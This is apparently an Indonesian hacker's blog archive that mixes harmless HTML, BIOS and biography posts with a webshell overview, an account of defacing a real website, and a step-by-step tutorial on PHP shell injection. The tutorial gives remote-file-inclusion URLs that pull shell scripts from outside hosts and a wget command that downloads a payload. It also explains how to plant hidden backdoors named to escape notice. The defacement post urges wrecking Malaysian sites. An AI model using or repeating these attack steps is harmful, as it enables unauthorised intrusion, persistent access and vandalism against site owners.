Langkah 3 : Gunakan kode ini untuk mengubah warna latar belakang ketika pengguna mengklik link (onClick).

<a href="link.htm" onClick="document.bgColor='#0000ff'">Link Text</a>

Langkah 4 : Gunakan kode ini untuk mengubah warna latar belakang dua kali, terus ketika pengguna tempat mouse di atas link, kemudian ketika pengguna mengambil mouse dari link (onMouseOver dan onMouseOut).

<a href="link.htm" onMouseOver="document.bgColor='#ff0000'"> onMouseOut="document.bgColor='#00ff00'">Link Text</a>

Langkah 5 : Gunakan kode ini untuk mengubah warna latar belakang tiga kali, terus ketika pengguna tempat mouse di atas link, kemudian ketika pengguna mengambil mouse dari link, dan ketika pengguna mengklik pada link (onMouseOver, onMouseOut, dan onClick).

<a href="link.htm" onMouseOver="document.bgColor='#ffff00'" onMouseOut="document.bgColor='#00ff00'" onClick="document.bgColor='#0000ff'">Link Text</a>

Untuk "link.htm" bisa kita ganti dgn alamat link yg kita tuju, contohnya :

<a href="link.htm" onMouseOver="document.bgColor='#ffffff'">Link Text</a>

Menjadi :

<a href="http://geoweek.wordpress.com" onMouseOver="document.bgColor='#ffffff'">Geoweek</a>

Untuk kode warna Background yg brwarna merah bisa kita ganti sesuai dgn warna kesukaan kita...

Tips Membuat Aplikasi PHP Yang Aman

2010-07-08T08:09:00.000-07:00

Vulnerabilities atau kelemahan keamanan pada aplikasi berbasis web menggunakan PHP merupakan hal yang tak habis-habisnya dibahas. Tulisan kali ini berisi tip dan trik membuat aplikasi PHP yang aman.

* Perhatikan Register Global selalu dalam kondisi OFF.

Sebenarnya tidaklah selalu benar bahwa jika register global berkondisi on lantas aplikasi PHP yang dibuat tidak aman. Ini semua bergantung kepada bagaimana seorang programmer membuat script-nya.

Berikut contoh kelemahan keamanan yang disebabkan oleh kesalahan dalam penulisan script yang mengakibatkan penyerang dapat dengan mudah memanfaatkan register global berkondisi on.

[php]
// lokasi script: http://localhost/login.php
// script login yang dipanggil dari sebuah form untuk masuk kedalam halaman Admin

// set variable $oke manjadi true jika autentifikasi sukses
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}

if ($oke) {
// masuk ke halaman admin
}
[/php]

Sekilas kode script diatas adalah kode yang aman, tetapi sebenarnya sama sekali tidak dengan kondisi register global on. Mengapa? Halaman Admin bisa diakses oleh siapa pun tanpa proses authentifikasi melalui alamat http://localhost/login.php?oke=true.

Bagaimana memperbaiki script diatas? Anda cukup menambahkan inisialisasi diawal seperti berikut:

[php num=5]
// Inisialisasi variable $oke
$oke=false;

if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
}
[/php]

atau

[php num=5]
if (authentifikasi($_POST['user'],$_POST['password']) {
$oke=true;
} else { // jika authentifikasi gagal, set variable $oke menjadi false
$oke=false;
}
[/php]

Contoh script diatas adalah salah satu dari kelemahan keamanan yang disebabkan oleh register global berkondisi on. Di sisi lain, programmer juga harus turut menanggung dosa akibat teknik programmingnya yang membuka kesempatan penyerang untuk mengeksploitasi kelemahan keamanan.

Teknik lain untuk mengamankan aplikasi dari ancaman register global berkondisi on adalah menerapkan apa yang disebut Security Throuh Obscurity (keamanan dengan teknik penyembunyian). Hanya saja, kelemahan keamanan akan segera ditemukan jika aplikasi dibuat menjadi aplikasi opensource, dimana calon penyerang dapat melihat sourcecode-nya secara langsung.

Jadi memang tidak benar 100% kalau kelemahan keamanan aplikasi PHP bermula dari register global berkondisi on. Ekploitasi kelemahan keamanan sistem hanya terjadi akibat kesalahan teknik dalam pembuatan program, dan karena aplikasi dibuat menjadi opensource yang memungkinkan calon penyerang melihat sourcecode nya secara langsung.

Webshell

2010-06-28T05:05:00.000-07:00

Tujuan utama dari berbagai macam serangan (sistem/web) umum nya adalah mendapatkan shell target, entah itu ‘direct shell’ ataupun ‘web shell’. Shell merupakan suatu interpreter yang disediakan oleh sistem operasi agar dapat digunakan oleh user untuk berinteraksi dengan sistem tersebut.

Contoh simple:

Cyberweb:~ cyberWeb$ pwd

/Users/cyberweb

Banyak sekali yang sering menggunakan shell namun tidak sadar bahwa itu adalah shell. Contohnya adalah bash pada linux, ataupun command prompt pada M$ Windows. Jenis exploitasi khusus nya yang dilakukan secara remote (remote exploitation) selalu berusaha semaksimal mungkin untuk mendapatkan shell target, tujuan nya jelas agar kita dapat mengendalikan target melalui shell tersebut. Banyak hal yang dapat kita lakukan setelah berhasil mendapatkan shell target.

Untuk serangan yang ditujukan terhadap aplikasi-aplikasi web, umum nya juga berusaha untuk mendapatkan shell target. Walaupun memungkinkan untuk mendapatkan system shell, pada kenyataan nya untuk tahap awal banyak yang menggunakan webshell setelah proses eksploitasi aplikasi web. Shell merupakan interpreter untuk berinteraksi dengan sistem, jenis shell yang memanfaatkan protokol http (web) untuk berinteraksi dengan sistem sering disebut webshell. Karena webshell ini berjalan diatas protokol HTTP, maka webshell membutuhkan suatu webserver. Jika pada sistem shell kita membangkitkan shell melalui aplikasi bash, csh, ksh (UNIX like) ataupun cmd.exe (Windows) maka pada web shell kita membangkitan shell melalui aplikasi .php, .asp, ataupun .jsp. Jenis webshell yang dapat digunakan tergantung pada teknologi target, jika target menggunakan aplikasi php maka kita harus menggunakan tipe phpshell dan jika target menggunakan asp maka kita harus menggunakan tipe aspshell.

Bagaimana cara kita mendapatkan web shell pada target tergantung pada jenis hole yang akan di eksploitasi serta kreativitas si penyerang, untuk RFI misal nya…kita tidak perlu upload webshell tersebut ke server target karena jenis hole ini akan membuat target meng-eksekusi webshell pada mesin lain. Namun untuk jenis hole pada web lain nya, kita dapat membodohi target untuk secara tidak sengaja men-download webshell tersebut dan selanjut nya kita dapat mengeksekusi webshell langsung via browser (http). Ada banyak sekali jenis webshell, baik yang sifat nya private ataupun public. Dan setiap webshell memiliki beberapa fungsi umum (seperti listing isi directory, menampilkan informasi sistem, dll) serta beberapa fungsi khusus (safe-mode bypass, encoder, sql-injection, backdooring, dll). Dan biasa nya, jenis webshell bersifat private merupakan hasil pengembangan dari jenis webshell lain dengan melakukan kustomisasi untuk mendapatkan fungsi lain yang kita inginkan.

Berikut ini adalah beberapa jenis webshell (public/private) yang umum digunakan oleh kalangan underground dalam melakukan serangan terhadap aplikasi-aplikasi web, beberapa jenis webshell dibawah ini merupakan favorite saya secara pribadi karena memiliki cukup banyak fungsionalitas, tentu saja masih banyak lagi jenis webshell dengan kemampuan khusus namun beredar di kalangan tertentu. So, here they are:

* C99Shell, C99 merupakan webshell produksi dari CCTeam rusia, C99 memiliki cukup banyak fitur yang terus dikembangkan dan saat ini banyak jenis private webshell menggunakan C99 sebagai template/base nya.

* r57, Jenis webshell r57 juga banyak digunakan serta dijadikan base template oleh berbagai jenis private webshell. Kalangan underground di Indonesia umum nya menggunakan webshell r57 ini .

* Explorer ASP, Webshell ini merupakan contoh webshell untuk target yang menggunakan teknologi ASP.

* Ekin0x, merupakan contoh private shell (seperti nya sekarang sudah public) dari cyber warrior security tim, webshell ini juga memiliki beberapa fungsi tambahan yang berbeda dari webshell lain.

* Locus7s webshell, Contoh webshell ini merupakan hasil pengembangan dari c100, C100 merupakan webshell rilis baru dari CCTeam (Captain Crunch Team) yang merupakan hasil pengembangan dari C99, kita bisa melihat bahwa webshell tersebut di customize oleh Locus7s team dan ditambahkan beberapa fungsi baru untuk kebutuhan private.

Itu adalah berbagai macam jenis webshell, kita bisa lihat bahwa webshell-webshell tersebut menyediakan fasilitas point-and-click sehingga memudahkan kita untuk meng-eksplorasi sistem target serta menjalankan fungsionalitas lain (seperti backdooring, brute-force, dll). Jenis webshell diatas termasuk webshell modern, namun bagi yang suka dengan webshell classic bisa menggunakan jenis webshell seperti ssh-webshell.

Jika kita mau bersusah payah sedikit untuk mempelajari code-code yang terdapat pada webshell-webshell tersebut, maka kita dapat membuat versi private milik kita ataupun kelompok kita pribadi. Dan juga menambahkan berbagai macam fungsi tambahan yang menurut kita akan sangat berguna. So, lagi-lagi dibutuhkan skill programming…khusus nya pemrograman aplikasi web seperti php dan asp. Selanjut nya, kita dapat menggunakan code-code diatas sebagai template / base untuk mengembangkan webshell milik kita pribadi (fungsi blind sql-injection, mass-defacing, scanner, dll bisa ditambahkan sendiri). Untuk jenis webshell yang lebih lengkap bisa mencoba webkit dari open-labs.

Gara2 maen Depes..

2010-05-18T10:39:00.000-07:00

Ini gara2 aku suka maen depes2n ke berbagai situs,, situs apa ja pasti aku hajar...
tiba waktu hajar situs ini : http://___.eu/
ini mirrorny :

http://indonesiandefacer.org/mirror/2010/05/rn4cast.html

FB ku langsung di Add sama yg punya sever situs itu, orang itu namanya "Tom Standaert" dy katanya orang Belgium, tpi aku gk curiga kalau orang itu adalah yang punya sever situs itu, habis itu ya terjadilah obrolan2 di FB saling bales Coment. Berikut ini adalah obrolanku sama yg punya sever situs itu :

KidDevilz Hde : thanks for the add,,, ^_^, where are you from??

Monday at 11:06pm · Comment · Like · See Wall-to-Wall

Tom Standaert : Belgium. Nice to meet you.

Apparently you hacked a website hosted one one of my servers :p
Backups, so no harm done.
It was http://www._____.eu/

Not sure if it was really you off course. It was signed

KidDevilz

.::Hacked By KidDevilz::.
With a reference to HDE.

Ring a bell? I noticed the apache allowed .inc files and also found several other vulnerabilities, but my main concern is that this website runs a -very early- version of an open source generic CMS system I'm developing, and maybe there might be a serious security hole I missed.
Although I'm aware of several in this version of the program.

Regards,

Tom

Yesterday at 2:38am

Tom Standaert : ok, found it on your wall - yesterday 0:38
care to share how?
SQL injection, the inc files , php injection?

Yesterday at 2:59am

Tom Standaert : by the way: it 's a non-profit organisation for whom I work for free, so not a very nice thing to delete their data ;)

Yesterday at 3:38am

KidDevilz Hde : yea, indeed my actions at the site was hacked, but I did not destroy or delete all the files that exist on the site, just tells me that the site was still a hole Gap ...
I only use SQL injection..

I apologize if less polite ...

I am glad to be your acquaintance same..

Yesterday at 5:08am ·

Tom Standaert : no problem, and as I said, no real harm was done, only some data in the mysql replaced.
I was just wondering how you did it. It was build fast because I did it for free, so I'm aware there might be several severe security holes.
Could you give me some more details on where exactly the huge gap is?

Yesterday at 5:16am

KidDevilz Hde : I only use sql-injection,,,,

if I may I help you, then I will tell you how Patch Technique Common Simple Web Attack ..

but I want to go to bed, because I was sleepy heavy ...... See More
had two days I did not sleep ..

I'll send to your facebook message ..

Yesterday at 5:26am ·

Karena aku udah ngantuk berat jadi ya gak aku lanjutin ngobrol2nya sama org tu...
dari pada ilang obrolan itu makanya aku buat update d blogku tercinta ini, buat kenang2an,,

Buat temen2 yg suka maen depes2n, jangan mendelet semua file yg da d situs itu..
Tpi kalau situsnya Malingsial Hancurkan ja sampek ke akar2nya sampek Down, pokok nya jangan d kasih ampun buat Malingsial...

.::| Salam UnderGround |::.

3 'Jagoan' IT Tanpa Bekal Ijazah

2010-05-12T23:35:00.000-07:00

Bagi sebagian orang ijazah dari perguruan tinggi adalah faktor yang menentukan kesuksesan di masa depan. Tapi bagi tiga jagoan IT dunia, ijazah ternyata bukanlah satu-satunya kunci untuk meraih kesuksesan.
Tahukah anda bila nama-nama besar seperti pendiri Microsoft, Bill Gates, pendiri Apple Steve Jobs, dan Pendiri Facebook, Mark Zuckerberg meraih sukses tanpa berbekal ijazah dari tempat kuliah masing-masing.

Gates bahkan dikenal sebagai orang paling sukses yang dikeluarkan dari kampusnya di Harvard University. Suami dari Mellinda ini, masuk Harvard di tahun 1973, tapi dua tahun kemudian keluar dari kampus dan bersama temannya Paul Allen ia mendirikan Microsoft.

Pria yang pernah dinobatkan dalam jajaran pria terkaya dunia selama satu dekade itu, akhirnya mendapat gelar Doktor Honoris Clausa dari bekas kampusnya di tahun 2007. "Mungkin saya membawa pengaruh yang buruk," canda Gates.

Jagoan IT berikutnya, Steve Jobs diketahui drop out dari Reed College. Ia hanya duduk di kampus tersebut kurang lebih enam bulan. setelah itu ia fokus untuk mendirikan Apple, neXT Computer dan Pixar. Karya-karyanya telah mempengaruhi pengembangan dunia komputer di Dunia.

Seolah mengikuti jejak kakak tingkatnya, pendiri Facebook Mark Zuckerberg juga meninggalkan bangku kampusnya di Harvard. Tapi situs jejaring pertemanannya yang dikembangkannya telah membius jutaan orang di dunia dan menghasilkan uang setidaknya sekira USD4 juta.

Diluar nama-nama 'jagoan' IT tersebut, juga banyak bintang terkenal yang juga meraih kesuksesan tanpa berbekal ijazah perguruan tinggi, sebut saja aktor Tom Hanks, Harisson Ford, Lady Gaga, hingga James Cameron.

Bikin Ngakak..

2010-04-29T20:25:00.000-07:00

Ini adalah gambar2 waktu chathing yang bikin aku tertawa ngakak, memalukan, menyedihkan,dll. tpi untung juga waktu di tanya balik aku gak jujur2 kali, mungkin kalau jujur2 kali tambah memalukan, ni adalah sebagian gambar yang sempet aku save soalnya waktu itu komputer yang aku pake' tiba2 error... :( :( . Mungkin kalau sempet aku save semua mungkin tambah seru ngakaknya... =)) =))

Berikut ini adalah gambar2nya :

Spesial terimakasih buat Priscyla Mariebeth dan Abang Mywisdom yang telah bikin aku tertawa ngakak sampek perutku sakit malem itu,,,,,,, =)) =)) =))

Cara Aman Mengotak-atik Setting BIOS PC

2010-03-11T02:21:00.000-08:00

Bila Windows adalah wajah ramah yang ditampilkan proyek-proyek komputer kepada dunia, maka BIOS adalah sisi gelap bawah sadar yang bertugas untuk berpikir. BIOS (Basic Input/Output System) adalah kode untuk fungsi-fungsi fundamental PC, seperti mengumpulkan ketukan tombol dari keyboard atau meletakkan pixel ke layar.

Program kecil ini bekerja di balik layar, menterjemahkan perintah Windows yang people-friendly menjadi angka nol dan satu yang hanya dimengerti oleh hardware Anda. Dan sebagaimana alam bawah sadar manusia, BIOS bisa berpengaruh sangat kuat pada tingkah laku dan kinerja PC Anda.

Terapi BIOS

Ketika teknologi baru muncul dan bug tua ditemukan, para pembuat komputer sering menerbitkan versi BIOS yang telah diupdate yang dapat mengatasi problem dan meningkatkan kinerja. Periksa situs Web pembuat PC Anda mengenai update terbaru. Namun pertama-tama pastikan Anda memiliki nomor versi terbaru BIOS; biasanya muncul sekilas di monitor Anda tepat setelah Anda menyalakan sistem. (Tekan tombol Pause bila kilasannya terlalu cepat.)

Mengupdate BIOS mudah, tetapi Anda harus melakukannya dengan hati-hati. Biasanya Anda perlu menjalankan program kecil dari floppy disk saja. Namun bila terjadi masalah, Anda hanya bisa meratapi motherboard yang tidak bisa lagi Anda gunakan. Jadi pastikan bahwa sebelumnya Anda telah membaca semua instruksi di file readme BIOS update. Dan selalu lakukan persis seperti apa yang petunjuk-petunjuk itu katakan.

Jika BIOS adalah bawah sadar PC, maka utiliti Setup merupakan fondasi untuk membangun karakter PC. Utiliti tersebut memiliki setting user untuk mengontrol harddisk, memori, kartu-kartu grafis, power saving, port USB, dan hardware lain. Program tersebut biasanya disertakan dalam disk, tetapi sekarang sudah tersimpan dalam chip ROM yang sama dengan BIOS PC.

Untuk membuka Setup, cukup tekan tombol (atau kombinasi tombol) yang disarankan kepada Anda untuk dimasukkan ketika PC melakukan start up. Masing-masing pembuat BIOS menggunakan tombol yang berbeda — Delete, F1, atau F10. Di layar Anda seharusnya memperlihatkan tombol atau tombol-tombol mana yang perlu ditekan untuk Setup tepat setelah layar menampilkan angka versi BIOS. Jika tidak, periksa dokumentasi sistem Anda.

Karena utiliti Setup dibuat oleh pembuat BIOS dan berada dalam chip yang sama dengan BIOS, ini sering disebut utiliti BIOS Setup. Dan karena utiliti ini menyimpan settingnya di chip clock/calendar — chip complementary metal-oxide semiconductor, atau CMOS — maka sering pula disebut sebagai program Setup CMOS. (Chip CMOS memiliki batere sendiri untuk memelihara setting chip sekalipun PC dimatikan.)

Utiliti Setup memiliki setting hardware yang berlimpah, mulai dari yang terlihat nyata, seperti setting waktu di clock PC, sampai yang tidak kelihatan, seperti jumlah “wait states” yang mengkoordinasi aliran data antara RAM dan CPU.

Pertama, Jangan Merusak

Ketika bekerja dengan utiliti Setup PC, gunakan petunjuk praktis yang sama diajarkan pada awal bedah otak: Bila Anda tidak tahu apa yang dilakukan sesuatu, jangan berurusan dengannya. Kecerobohan mengubah wait state atau setting lainnya dapat menurunkan kinerja atau bahkan menyebabkan sistem mengalami crash.

Jika Anda mengira Anda telah tanpa sengaja mengubah setting ketika sedang bekerja dengan utiliti Setup, segera berhenti dan mulailah dari awal lagi. Semua utiliti Setup memiliki pilihan menu yang memungkinkan Anda keluar tanpa menyimpan perubahan. Anda mungkin melihat pula pilihan untuk mengembalikan setting ke nilai defaultnya. Abaikan opsi ini: Bila vendor PC Anda telah melakukan fine-tune terhadap sistem, setting default si pembuat BIOS mungkin membuatnya menjadi tidak optimal.

Backup setting-setting Anda sebelum membuat perubahan. Bila batere yang menghidupi chip clock/calendar mati, setting-setting Anda mati bersamanya. Bila utiliti Setup Anda mempunyai opsi backup, gunakanlah. Jika tidak, catat setting di kertas — atau tekan key Print Screen untuk masing-masing layar di utiliti tersebut (tetapi ini tidak selalu berfungsi).

Apa yang Dicari

Sebelum mulai, baca sampai selesai user manual yang menyertai PC atau motherboard. Banyak manual menawarkan penjelasan singkat masing-masing setting. Setting bervariasi menurut manufaktur dan model, namun Anda seharusnya menemukan ini di hampir semua PC:

Optimalisasi dan kompatibilitas setting: Utiliti Setup sering berisi setting-setting untuk kinerja hardware. Kadang-kadang ini tidak diatur secara optimal di pabrik, utamanya pada PC yang dibuat berdasar pesanan atau generik. Scan seluruh program Setup. Setting modus AGP dan setting DMA merupakan kandidat utama untuk dioptimalisasi. Setting-setting ini juga berguna untuk troubleshooting hardware yang baru diinstall: Menonaktifkan atau menurunkan setting yang diberikan bisa memicu ketidak-kompatibelan kartu grafis, CD-ROM drive, atau peranti lain yang terjadi sebelumnya.

Setting harddisk: Anda akan menemukan tabel, biasanya pada halaman kedua atau Advanced dan dengan judul “IDE”, yang mendaftar semua parameter konfigurasi untuk EIDE harddisk yang secara langsung terkoneksi ke motherboard. (SCSI harddisk dan EIDE harddisk yang tidak punya kartu ekspansi akan menjalankan program konfigurasinya sendiri.) Sementara kebanyakan PC yang dibuat selama beberapa tahun terakhir dapat dengan mulus mendeteksi dan mengkonfigurasi harddisk baru, sebagian memerlukan instalasi manual. Baca your dokumentasi disk baru Anda mengenai prosedur tersebut dan gunakan opsi-opsi on-screen untuk membuat perubahan di tabel ini.

Floppy disk: Opsi ini memungkinkan Anda menyetel tipe floppy drive (3,5 inci, 1,44MB, sebagai contoh) yang telah Anda tetapkan sebagai drive A: atau B: Anda. Ini merupakan setting yang perlu diperiksa jika Anda mengalami problem floppy-drive. Sebagian utiliti Setup mempunyai setting sekuriti `Floppy Read only` tersendiri yang mencegah data Anda dituliskan ke floppy disk dan dihapus dari PC.

Urutan booting: Setting ini menentukan mana yang pertama kali dilihat PC ketika instruksi boot-up. Contoh: `A: kemudian C:`, `C: kemudian A:`, atau `C:, Zip drive`. Untuk booting dari CD-ROM drive, Zip, atau LS-120, Anda sepertinya harus mengubah setting ini.

Proteksi password: Bila ini diaktifkan, BIOS akan menanyakan password sebelum booting up. Sangat berhati-hatilah dengan yang satu ini: Bila melupakan password, Anda terpaksa mereset jumper motherboard atau mencopot batere CMOS, yang akan menyebabkan Anda kehilangan semua setting, atau Anda bahkan harus membeli motherboard baru.

Setting IRQ: Bila Anda butuh setting IRQ ekstra untuk hardware baru, Anda perlu membebaskan satu IRQ dengan menonaktifkan feature yang tidak digunakan, seperti port serial, port paralel, atau port USB.

Setting port paralel: Pilih modus yang paling cocok untuk hardware. Modus ECP atau EPP dapat sangat mempercepat printer dan peranti lain.

Kipas RPM dan temperatur CPU: Dua parameter kritis ini sebaiknya dicentang secara periodik untuk memastikan mereka berfungsi dengan benar.

Drive Kotor

Benah-benah di akhir minggu meninggalkan lapisan debu yang menutupi seluruh kantor, dan Anda kuaatir CD-RW drive Anda mungkin kotor. Bagaimana sebaiknya membersihkannya?

Mungkin sebaiknya tidak. Gosokan paling halus sekalipun dapat menghambat laser sensitif pada drive, jadi bila tidak rusak, jangan bersihkan. Bila kinerja menurun, atau bila drive Anda tidak mampu membaca medianya, coba beberapa semprotan yang diarahkan dengan baik dari kaleng semprotan udara. Pastikan menggunakan sedotan plastik yang menyertai kaleng. Dan jaga agar menyemprot pelan-pelan; desakan semprotan yang berlebihan dapat menyebabkan kondensasi yang menumpuk uap lembab pada interior drive.

Menghentikan Program Tua

Beberapa program software yang benar-benar tua hanya tidak sanggup berfungsi pada PC kecepatan tinggi sekarang ini. Jika Anda memiliki program kuno yang mengunci atau memunculkan pesan error setiap kali Anda hendak menjalankannya, cobalah CPUKiller; utiliti gratis dan mudah digunakan, yang memungkinkan Anda memperlambat PC sesedikit atau sebanyak Anda inginkan. Pergilah ke www.cpukiller.com untuk mendownloadnya.

Sumber : Ilmukomputer.com

Php shell Injection,Php Shell Backdooring,Patching

2010-02-22T05:56:00.000-08:00

1.Php Shell Injection

- Landasan Teori

PHP Shell Injection ( Injeksi PHP ) itu afaan om?

PHP Shell Injection adalah sebuah tindakan untuk melakukan eksploitasi terhadap celah keamanan sebuah website dengan cara menginjeksi Shell hasil pengkodean bahasa PHP terhadap file yang terdapat pada website tersebut yang memiliki kelemahan ataupun kesalahan pemrograman/pengkodean. Tapi kalau orang kita biasa menyebutnya Nginjek Shell hehe… Yang saya maksud dengan PHP Shell Injection di sini adalah berbeda hal dengan PHP Injection. PHP Shell Injection yang akan saya bahas adalah tindak lanjut atau tahap eksploitasi selanjutnya dengan memanfaatkan bug PHP Injection ataupun Remote File Inclusion (RFI), yaitu pengeksploitasian sebuah target dengan media PHP Shell. Perhatikan perbedaannya :
PHP Injection, memasukan perintah-perintah shell langsung dengan menambahkan perintah PHP pada URL:

http://www.target.com/[path]/page.php?action=exit.passthru($_GET[cok]);exit&cok=wget http://xXx.co.cc/xXx/r00t

Yang bertulisan tebal itu perintah PHP-nya sedangkan yang bertulisan miring adalah perintah shellnya.

PHP Shell Injection-nya :
http://www.target.com/[path]/page.php?action=exit.include($_GET[cok]);exit&cok= [injekan??]

Remote File Inclusion (RFI), memasukan file yang berisi script PHP dari luar ke dalam target dengan memanfaatkan kesalahan statemen pengkodean PHP pada file di dalam target yang tidak terfilter dengan baik, misalnya bug ini :

require_once($bcrm_pub_root . “/public_prepend.inc.php”)
PHP Shell Injection-nya :
http://www.target.com/browser_crm/pub/clients.php?bcrm_pub_root=[injekan??]

- Saatnya Beraksi!
Setelah anda berhasil mendapatkan target berupa situs yang mempunyai kelemahan terhadap serangan RFI (Remote File Inclusion) dari proses scanning yang dilakukan oleh bot scan kamu sebelumnya, misalnya saja bot scan kamu menampilkan output seperti di bawah ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

Nah dari url yang dikeluarkan oleh bot scan tersebut, kamu ambil/copy sampai ke tanda ’=’ (sama dengan) seperti pada gambar di atas (tulisan evil code-nya dibuang), lalu tambahkan di belakangnya (tanpa spasi) script PHP Shell yang mau dipakai untuk injeksi (PHP Shell Injector) dan diakhiri dengan tanda tanya ( ? ).

Lah mana PHP Shell Injector-nya??? Bagi donk!!!
Hare gene gak punya PHP Shell Injector….? hehehe

Oke kalo yang belum punya coba aja masuk ke irc server indoirc disana banyak yg scan minta aja kali dikasih, Kalau udah dapat semuanya, misalnya seperti ini :

- Target tadi:

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=[evil code]

- PHP Shell Injector:

http://geocities.com/gara_013/injek.txt???

Sekarang gabungkan keduanya jadi seperti ini :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Jangan lupa tanda tanya dibelakangnya harus ditambahkan. Setelah itu paste-kan hasil di atas ke browser lalu jalankan. Kalo browser menampilkan hasil seperti di bawah ini atau mungkin mirip (PHP Injektor memiliki tampilan berbeda-beda), maka selamat buat kamu, kamu telah melakukan yang namanya PHP SHELL INJECTION!

Wew, yang ditampilkan di atas itu apa namanya sih?? Lalu apa gunanya?? Yang di atas itulah yang namanya shell. Shell adalah sebuah interface agar user dapat berkomunikasi dengan sistem komputer. Komunikasi yang terjadi yaitu user dapat mengetikan/menginput perintah-perintah khusus pada shell yang akan diterjemahkan pada komputer untuk dikerjakan.
Hanya saja shell seperti di atas sifatnya masih hanya remote dari luar server dan kalau celah keamanannya telah diketahui oleh adminnya dan ditutup, maka kamu nggak bisa lagi mengaksesnya.

Yahhh… ngapain juga repot-repot injek-injekan PHP segala kalo shell-nya gak tahan lama..!!!
Wew, tenang.. tenang… bisa kita akalin biar lebih awet. Segala permasalahan pasti ada pemecahannya. Pada tahap inilah kita harus melakukan apa yang orang Arab bilang PHP SHELL BACKDOORING.

2. PHP SHELL BACKDOORING (Menanam Backdoor PHP)
- Landasan Teori

Backdoor itu apa sih om?
Backdoor adalah sebuah program ataupun hasil pengkodean yang memungkinkan seseorang dapat mengakses secara remote komputer korban (tempat backdoor ditanam). Bisa disebut juga sebagai ’jalan belakang’ untuk masuk ke komputer korban tanpa harus melalui form login.
Jadi dengan backdoor, kita tidak lagi mengakses shell di target dari luar (PHP Injection) melalui vulnerability lain seperti pada awal tutorial ini. Kita akan dapat mengakses komputer korban sekalipun celah keamanan tadi pun telah ditutup oleh adminnya. Nah, dalam tutor ini backdoor yang kita gunakan adalah PHP Shell backdoor. Backdoor ini adalah PHP Shell Injector itu sendiri (gampang kan?). Kalau bisa biasakanlah memakai backdoor yang berupa PHP Shell sederhana saja, jangan yang berat dan kompleks sejenis C99 dan R57, karena sangat mudah bagi admin target untuk menemukannya. Logikanya begini, kalau orang lain (bukan admin) saja bisa menemukan dengan mudah backdoor C99 atau R57 melalui google, apalagi admin target itu sendiri kan? Dan biasakan juga menanam lebih dari satu backdoor di tempat yang berbeda-beda pada sebuah target, dengan begitu apabila satu backdoor dihapus oleh admin, masih ada backdoor lain yang belum tentu ketahuan.

- Saatnya Beraksi!

Pertama-tama kamu cari dulu directory yang mempunyai Permission 777 (Direktori yang dapat diakses/dibaca, dapat diubah/diedit, dapat dieksekusi) atau perizinan direktorinya drwx rwx rwx. (Readable, Writeable, eXecutable untuk semua group). Caranya dengan mengeksekusi perintah :

find –perm –d /777

Namun, PHP backdoor ini tidak hanya membutuhkan direktori 777, tapi juga harus direktori yang sifatnya public, artinya direktori yang dapat diakses langsung lewat browser oleh semua orang. Ciri-ciri dari direktori ini yaitu pada path direktorinya ada tulisan seperti www, httdoc, httpd, html, public_html atau lain sebagainya. (Kalau emang public, dapat dites nantinya saat backdoor sudah terpasang). Coba liat hasil setelah menjalankan perintah di atas :

Setelah mendapatkan direktori tersebut misalnya salah satu direktori 777 yaitu /var/www/intruder/forum/db seperti di atas, langsung aja masuk/pindah ke direktori tersebut dengan mengeksekusi perintah ini :

cd /var/www/intruder/forum/db atau secara manual ketik aja di line direktori
Kalau sudah, sekarang tinggal mendownload/transfer file backdoor (PHP Injector tadi) ke dalam target. Caranya seperti biasa menggunakan wget atau lwp-download seperti ini :
wget http://h1.ripway/newbe/kambe.txt kalo gak bisa coba lwp-download
Jika perintah itu sukses, maka lanjutkan dengan mengubah file PHP Shell tersebut, dalam hal ini kambe.txt menjadi file berekstensi PHP dengan perintah ini :

mv kambe.txt.txt .system.php

Perintah tersebut akan mengubah file kambe.txt menjadi file hidden backdoor .system.php, dan seperti yang dijelaskan sebelumnya bahwa tanda titik di depan nama file tersebut menandakan/membuat file tersebut menjadi hidden. Dan sengaja diberinama .system.php biar gak terlalu mencurigakan. Kamu bisa lebih kreatif dengan membuat nama lain yang mirip dengan file-file yang ada di dalam direktori tersebut, jangan sampai terlihat perbedaan yang mencolok antara nama backdoor kamu dengan nama file-file lain di dalam target (Ninja Style).

Kalau semua sudah dilakukan tanpa error seperti langkah-langkah di atas, maka selamat, kamu telah melakukan Backdooring!
Horeee… tapi gimana mengakses backdoor tadi om???

Teewwwww….
Oh iya… caranya adalah dengan mengakses alamat file backdoor tadi lewat browser .
Tapi alamat file backdoornya apa om???
Nah, alamat file backdoor tadi dapat diliat dengan cara :

- Liat direktori 777 tempat kamu menyimpan backdoor tadi :

/var/www/intruder/forum/db

- Nah itu artinya alamat (URL) backdoor tersebut adalah :

http://intruder.gmork.cz/forum//db/.system.php

Mengapa di antara forum dan db garis miringnya double sedangkan pada direktori yang ada pada shell hanya 1 garis miring saja? Untuk menentukannya dapat dilihat dari URL PHP Injection tadi yang menyatakan setelah direktori forum akan diikuti garis miring double untuk mengakses direktori di bawahnya. Coba perhatikan lagi :

http://intruder.gmork.cz/forum//includes/usercp_sendpasswd.php?phpbb_root_path[user]=http://h1.ripway.com/newbe/kambe.txt?

Benar kan.. dua garis miring kan setelah forum. (Belajarlah mempertajam ketelitian dan analisa kamu)

Sekarang tinggal kamu tes aja mengkases backdoor tersebut dari browser. Kalo hasilnya mengeluarkan tampilan shell seperti atau mirip gambar di bawah ini (masing-masing PHP backdoor berbeda-beda tampilan sama halnya dengan perbedaan PHP Injector), berarti semua berjalan dengan lancar :

PHP Injection sudah. Backdooring sudah (Jangan lupa simpan URL backdoor kamu tadi). Sekarang kamu nggak perlu ngemis-ngemis lagi minta shell dari orang lain kayak tutor yang pertama karena kamu udah bisa memproduksi shell kamu sendiri.

3. PATCHING
- Landasan Teori

Patching itu afaan om?
Patching adalah suatu kegiatan untuk menutup celah keamanan (Vulnerability) dari sebuah website sehingga tidak bisa dieksploitasi lagi oleh siapa pun melaluinya.
Ada hikmah kebaikan dan keburukan dari proses patching yang akan kamu lakukan ini, yaitu :

1. Kebaikan : Kamu telah berhati mulia (weleh-weleh…) dengan menutup celah keamanan (kelemahan) sebuah website orang lain.

2. Keburukan : Kamu egois karena hanya ingin menguasai target sendiri saja. Yang lain jadi pada gak bisa masuk lagi deh lewat tuh celah keamanan. Hehehe…
Mari diambil hikmahnya….. yuuu…

- Saatnya Beraksi!

